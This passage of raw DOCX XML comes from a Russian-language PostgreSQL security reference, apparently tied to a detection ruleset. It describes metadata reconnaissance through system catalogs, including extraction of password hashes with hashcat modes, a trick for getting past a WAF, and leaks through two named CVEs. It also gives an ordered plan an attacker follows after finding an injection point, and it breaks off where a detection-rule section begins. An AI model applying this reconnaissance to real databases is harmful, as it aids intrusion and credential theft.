        <w:t>В категории 3.8 разобраны шесть векторов разведки и утечки метаданных PostgreSQL — всё, что атакующий извлекает из кластера через системные каталоги и статистику ещё до основной атаки. Это первый шаг почти любой пост-эксплуатации: версия и расширения определяют, какие из остальных категорий применимы; имена таблиц/колонок — содержание UNION-payload-ов для 3.1; SECURITY DEFINER-функции — цели для 3.13; хеши паролей — post-exploitation после 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545626B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.1 pg_class / pg_namespace / pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — карта схем, таблиц, колонок с типами. PUBLIC. Три payload-карточки (список таблиц, колонки таблицы с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format_type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как WAF-альтернатива).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0817EDBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.2 pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функции, сигнатуры, языки, owner-ы, флаг SECURITY DEFINER, тело (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). PUBLIC. Две карточки (Payload A — каталог функций с разметкой SECURITY DEFINER + owner=postgres; Payload B — тело конкретной plpgsql-функции через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regprocedure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-каст). Ключевая асимметрия: для чтения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> право EXECUTE не требуется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19080211" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.3 pg_authid / pg_shadow / pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — хеши паролей (SUPERUSER) и карта ролей (PUBLIC). Payload A — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с конкатенацией флагов (super, replication, bypassrls, createrole); Payload B — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid.rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после получения SUPERUSER с разбором форматов md5 и SCRAM-SHA-256 (hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-m 12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-m 28600</w:t>
      </w:r>
      <w:r>
        <w:t>). Cross-system pivot через переиспользованные пароли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63440590" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.4 Fingerprinting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пакетом, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t>. PUBLIC. Первый запрос после получения точки инъекции: версия определяет, какие CVE применимы; пути конфигов — без угадывания дистрибуции; список extension — какие OOB/RCE-векторы из 3.6/3.7 доступны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439658C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.5 query_to_xml / table_to_xml / database_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — массовый дамп одним вызовом. PUBLIC + SELECT на дампируемые объекты. Не privilege bypass — </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">компактность. Обходит WAF-сигнатуры на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (опасный запрос — внутри строкового аргумента функции). Не дополняет привилегии — но экономит подбор UNION и chunked-итерацию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D8A09B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.6 pg_stats / pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — утечка через optimizer statistics. Три уровня: baseline (PUBLIC + SELECT на колонку); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R17 CVE-2024-4317</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обход колоночного ACL (до 14.12/15.7/16.3, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>бинар-патч не достаточен — нужен `fix-CVE-2024-4317.sql`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R26 CVE-2025-8713</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обход view-ACL/RLS через custom operator (до 13.22/14.19/15.14/16.10/17.6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0696641B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>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9479F" w14:paraId="62D23FAC"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28B14C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Подраздел</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CA9269B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Что утекает</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03ADC01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Минимальная привилегия</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D16E815" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Версионная зависимость</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="688910D4"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E1A5B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.1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9F3D78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Имена схем/таблиц/колонок с типами</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05CBDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC</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6A714B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Любая 14–17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="491D5A9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5772E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.2</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DFD23F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Функции + тело (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>prosrc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>) + SECURITY DEFINER</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919BEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC</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1768D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Любая 14–17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="47742518"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284672" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.3 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2327C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Роли + флаги (без хешей)</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B8F4A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC</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8D6BFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Любая 14–17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="447756A7"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FEA4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.3 B</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8C6AFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Хеши паролей (md5 / SCRAM-SHA-256)</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F1054F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SUPERUSER или </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_read_all_data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597A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">14+ для </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_read_all_data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="78983C49"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4429F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.4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0AFF1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Версия, ОС, дистрибуция, GUC, extension</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E9C438" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC</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19532A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Любая 14–17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="46B06764"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4DA80C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.5</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347AA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Произвольный SELECT-результат в XML</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2052D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC + SELECT на target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9D7C25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Любая 14–17 (libxml)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="42619EE7"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7B39E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.6 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690CD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MCV / histogram колонок с SELECT-правом</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1E5752" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC + SELECT на колонку</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0895A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Любая 14–17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2C7FB8D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19D42B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.6 B (R17)</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ED3DB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MCV колонок </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>без</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> SELECT-права</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64F231" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC</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AC066F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">≤ 14.11 / 15.6 / 16.2 (или без </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>fix-CVE-2024-4317.sql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="115A8F8E"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E34595" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.8.6 C (R26)</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F13C6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MCV из view/RLS-таблиц через custom op</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A7C62A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE на схеме</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6A0550" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 13.21 / 14.18 / 15.13 / 16.9 / 17.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A41E49F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Типичная последовательность разведки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC7DC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атакующий после получения точки инъекции идёт по следующему ordered-плану:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A22937" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.4 Payload A (`version()`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — мгновенно знает major.minor.OS, отсекает 80% неприменимых CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7313E85C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.4 Payload B (`pg_settings` пакетом)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пути конфигов, SSL, log_statement, row_security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC61944" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.4 Payload C (`pg_extension`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — что установлено: открывает доступ к 3.6 (dblink/postgres_fdw) и 3.7 (plperlu/plpython3u).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C42BAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.1 Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — список таблиц приложения; выбор target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CC9437" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.1 Payload B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — колонки target с типами для последующих UNION (3.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5EF24D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.2 Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SECURITY DEFINER-функции с owner=postgres → цели для 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B82322B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.6 Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — most_common_vals чувствительных колонок без полного перебора строк.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB45F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.3 Payload A (`pg_roles`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — карта ролей, целевая superuser-роль для 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D479388" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Только после этой carte d'identité переходит к собственно эксплуатации (3.1/3.6/3.7/3.13). На непатченных кластерах добавляются шаги 3.8.6 B/C и 3.8.3 B (после 3.13).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF3A5D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>rules.py — готовое правило для класса METADATA_RECON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E165B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сводный regex по всем шести подразделам 3.8. Три ветки с разным базовым риском:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C4E3E"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6EF2684D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class VulnerabilityClass(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6498529F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
